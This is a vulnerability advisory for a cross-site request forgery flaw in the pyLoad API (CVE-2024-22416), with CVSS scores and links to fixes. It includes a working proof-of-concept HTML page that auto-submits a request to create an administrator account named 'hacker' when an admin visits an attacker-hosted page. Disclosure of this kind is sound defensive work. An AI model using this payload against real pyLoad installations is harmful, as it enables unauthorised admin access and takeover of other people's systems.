CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
29.5%
The pyload
API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict
, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator’s browser into creating a new admin user.
We host the following HTML file on an attacker-controlled server.
<html>
<body>
<form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html
, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22
, adding a new administrator to the pyload
application.
The attacker can now authenticate as this newly created administrator user with the username hacker
and password hacker
.
Any API call can be made via a CSRF attack by an unauthenticated user.
github.com/pyload/pyload
github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e
github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc
github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm
github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml
nvd.nist.gov/vuln/detail/CVE-2024-22416
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
29.5%